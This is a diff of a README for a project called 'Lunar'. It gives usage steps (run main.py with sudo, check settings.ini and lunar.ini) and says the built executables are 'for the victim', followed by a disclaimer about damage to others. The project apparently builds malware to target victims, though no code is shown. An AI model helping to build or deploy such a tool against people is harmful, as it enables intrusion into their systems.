clprt333/Lunar/README.md

 Usage: sudo python3 main.py

 Select 1 or 2.
-Make sure to check settings.
+Make sure to check settings. (settings.ini and lunar.ini)
 Do not click the executables within the directories, these are for the victim.
-The executables that are built are an example.
 I AM NOT RESPONSIBLE FOR ANY DAMAGE YOU DO TO OTHERS OR YOURSELF YOU HAVE BEEN WARNED.

 Contains 2 Modules